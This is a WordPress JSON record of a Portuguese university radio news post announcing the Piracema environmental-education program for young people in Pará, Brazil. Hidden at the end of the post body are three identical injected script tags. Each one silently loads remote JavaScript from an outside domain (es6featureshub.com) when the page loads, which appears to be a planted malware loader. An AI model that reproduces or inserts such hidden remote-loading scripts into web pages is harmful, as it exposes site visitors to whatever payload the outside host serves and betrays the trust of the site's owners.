{"id":7828,"date":"2020-11-25T15:02:39","date_gmt":"2020-11-25T17:02:39","guid":{"rendered":"http:\/\/radio.ufpa.br\/?p=7828"},"modified":"2025-10-21T11:41:03","modified_gmt":"2025-10-21T14:41:03","slug":"7828","status":"publish","type":"post","link":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/","title":{"rendered":"Ame o Tucunduba inscreve jovens para programa de multiplicadores"},"content":{"rendered":"<p>Nadar contra a corrente em dire\u00e7\u00e3o \u00e0s nascentes do rio e multiplicar vidas. O Piracema &#8211; Programa de Multiplicadores \u00e9 uma forma\u00e7\u00e3o online e gratuita para jovens que querem aprender e multiplicar ferramentas de educa\u00e7\u00e3o ambiental cr\u00edtica e de mobiliza\u00e7\u00e3o social pelo territ\u00f3rio da Amaz\u00f4nia paraense.\u00a0Nadar contra a corrente em dire\u00e7\u00e3o \u00e0s nascentes do rio e multiplicar vidas. O Piracema &#8211; Programa de Multiplicadores \u00e9 uma forma\u00e7\u00e3o online e gratuita para jovens que querem aprender e multiplicar ferramentas de educa\u00e7\u00e3o ambiental cr\u00edtica e de mobiliza\u00e7\u00e3o social pelo territ\u00f3rio da Amaz\u00f4nia paraense.<\/p>\n<p>O Piracema \u00e9 realizado pela Ame o Tucunduba e conta com o apoio do Fundo Casa Socioambiental. A iniciativa foi motivada pela urg\u00eancia de agir em prol da mitiga\u00e7\u00e3o dos efeitos da crise clim\u00e1tica, focando especialmente no Estado do Par\u00e1, que \u00e9 l\u00edder em emiss\u00f5es de gases de efeito estufa no Brasil, de acordo com o SEEG.<\/p>\n<p>Ser\u00e3o 96h de forma\u00e7\u00e3o pr\u00e1tica e te\u00f3rica dispon\u00edveis de forma online. Territorialidade e identidade amaz\u00f4nida, saneamento b\u00e1sico, mudan\u00e7as clim\u00e1ticas e tecnologia ser\u00e3o alguns dos temas abordados nas aulas, que acontecer\u00e3o no primeiro semestre de 2021. A ideia \u00e9 colaborar na forma\u00e7\u00e3o cr\u00edtica de jovens paraenses a partir de uma educa\u00e7\u00e3o ambiental que v\u00e1 al\u00e9m da reciclagem de res\u00edduos s\u00f3lidos e do uso de canudinhos de metal. Queremos que essas pessoas possam, a partir de suas viv\u00eancias e comunidades, construir um futuro ecologicamente equilibrado.<\/p>\n<p>As inscri\u00e7\u00f5es v\u00e3o at\u00e9 o dia 27 de novembro e s\u00e3o 25 vagas para jovens entre 18 e 30 anos. 50% das vagas ser\u00e3o destinadas \u00e0s mulheres e 70% \u00e0s pessoas n\u00e3o brancas (pretas, pardas e ind\u00edgenas). O programa tamb\u00e9m prev\u00ea 10 bolsas de aux\u00edlio internet para jovens com acesso limitado \u00e0 mesma.<\/p>\n<p>A Ame o Tucunduba \u00e9 um coletivo formado por 7 mulheres, de diversas \u00e1reas de conhecimento, em 2016. Dos projetos desenvolvidos, destaca-se a Expedi\u00e7\u00e3o Tucunduba, uma viv\u00eancia da nascente \u00e0 foz do Rio Tucunduba, em que jovens constroem um aprendizado sobre saneamento b\u00e1sico e rios urbanos de maneira l\u00fadica e participativa. J\u00e1 foram realizadas 11 edi\u00e7\u00f5es em 5 escolas p\u00fablicas, envolvendo 300 pessoas e em 2019 ganhou um pr\u00eamio especial da Embaixada da Alemanha.<\/p>\n<p><strong>Fundo Casa Socioambiental &#8211;<\/strong> O Fundo Casa Socioambiental \u00e9 uma organiza\u00e7\u00e3o que busca promover a conserva\u00e7\u00e3o e a sustentabilidade ambiental, a democracia, o respeito aos direitos socioambientais e a justi\u00e7a social por meio do apoio financeiro e fortalecimento de capacidades de iniciativas da sociedade civil na Am\u00e9rica do Sul.<\/p>\n<p>Para isso, desenvolvem uma rede de apoio a pequenas iniciativas da sociedade civil. Uma rede que mobiliza recursos, fornece suporte e fortalece as suas capacidades, garantindo uma autonomia cada vez maior para esses grupos, que est\u00e3o espalhados por toda a Am\u00e9rica do Sul.Esse ano realizou a chamada de projetos Programa Casa Cidades Amaz\u00f4nicas 2020 &#8211; Cidades Mais Justas e Resilientes, no qual o Piracema &#8211; Programa de Multiplicadores foi selecionado, junto a outros 22 projetos.<\/p>\n<p><strong>Servi\u00e7o:<\/strong><br \/>\n<strong>Piracema &#8211; Programa de Multiplicadores | Forma\u00e7\u00e3o online e gratuita<\/strong><br \/>\nData de inscri\u00e7\u00e3o: 18 \u00e0 27 de novembro<br \/>\nP\u00fablico: jovens do Estado do Par\u00e1, entre 18 e 30 anos<br \/>\nEndere\u00e7o para as inscri\u00e7\u00f5es: www.ameotucunduba.org\/piracema<br \/>\nE-mail para contato: piracema@ameotucunduba.org<br \/>\nRedes Sociais: fb.com\/ameotucunduba | instagram.com\/ameotucunduba<\/p>\n<p>Texto e foto: Ame o Tucunduba<script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p> &#8230; <a title=\"Ame o Tucunduba inscreve jovens para programa de multiplicadores\" class=\"read-more\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\" aria-label=\"Read more about Ame o Tucunduba inscreve jovens para programa de multiplicadores\">Ler mais<\/a><\/p>\n","protected":false},"author":2,"featured_media":7829,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_exactmetrics_skip_tracking":false,"_exactmetrics_sitenote_active":false,"_exactmetrics_sitenote_note":"","_exactmetrics_sitenote_category":0,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[696],"tags":[],"class_list":["post-7828","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ufpa-noticias"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA<\/title>\n<meta name=\"description\" content=\"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA\" \/>\n<meta property=\"og:description\" content=\"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\" \/>\n<meta property=\"og:site_name\" content=\"Radio Web UFPA\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/radiowebufpa\" \/>\n<meta property=\"article:published_time\" content=\"2020-11-25T17:02:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T14:41:03+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"599\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Fabr\u00edcio Queiroz\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:site\" content=\"@radiowebufpa\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Fabr\u00edcio Queiroz\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\"},\"author\":{\"name\":\"Fabr\u00edcio Queiroz\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\"},\"headline\":\"Ame o Tucunduba inscreve jovens para programa de multiplicadores\",\"datePublished\":\"2020-11-25T17:02:39+00:00\",\"dateModified\":\"2025-10-21T14:41:03+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\"},\"wordCount\":585,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1\",\"articleSection\":[\"UFPA Not\u00edcias\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\",\"name\":\"Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1\",\"datePublished\":\"2020-11-25T17:02:39+00:00\",\"dateModified\":\"2025-10-21T14:41:03+00:00\",\"description\":\"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1\",\"width\":900,\"height\":599},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ame o Tucunduba inscreve jovens para programa de multiplicadores\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096\",\"name\":\"Fabr\u00edcio Queiroz\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g\",\"caption\":\"Fabr\u00edcio Queiroz\"},\"description\":\"Editor e Jornalista respons\u00e1vel\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA","description":"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/","og_locale":"pt_BR","og_type":"article","og_title":"Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA","og_description":"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.","og_url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2020-11-25T17:02:39+00:00","article_modified_time":"2025-10-21T14:41:03+00:00","og_image":[{"width":900,"height":599,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","type":"image\/jpeg"}],"author":"Fabr\u00edcio Queiroz","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Fabr\u00edcio Queiroz","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/"},"author":{"name":"Fabr\u00edcio Queiroz","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096"},"headline":"Ame o Tucunduba inscreve jovens para programa de multiplicadores","datePublished":"2020-11-25T17:02:39+00:00","dateModified":"2025-10-21T14:41:03+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/"},"wordCount":585,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","articleSection":["UFPA Not\u00edcias"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/","url":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/","name":"Ame o Tucunduba inscreve jovens para programa de multiplicadores - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","datePublished":"2020-11-25T17:02:39+00:00","dateModified":"2025-10-21T14:41:03+00:00","description":"Projeto Ame o Tucunduba vai promover forma\u00e7\u00e3o online e gratuita para jovens voltado \u00e0 educa\u00e7\u00e3o ambiental cr\u00edtica e \u00e0 mobiliza\u00e7\u00e3o social.","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","width":900,"height":599},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/ufpa-noticias\/7828\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"Ame o Tucunduba inscreve jovens para programa de multiplicadores"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/f3f139516982741ca0831359933ac096","name":"Fabr\u00edcio Queiroz","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/16286edb2cee888d704ce74385081b7f?s=96&d=mm&r=g","caption":"Fabr\u00edcio Queiroz"},"description":"Editor e Jornalista respons\u00e1vel","url":"https:\/\/radio.ufpa.br\/index.php\/author\/fabricio\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2020\/11\/Ame-o-Tucunduba.jpg?fit=900%2C599&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/s8TJeA-7828","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7828","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=7828"}],"version-history":[{"count":4,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7828\/revisions"}],"predecessor-version":[{"id":17608,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/7828\/revisions\/17608"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/7829"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=7828"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=7828"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=7828"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}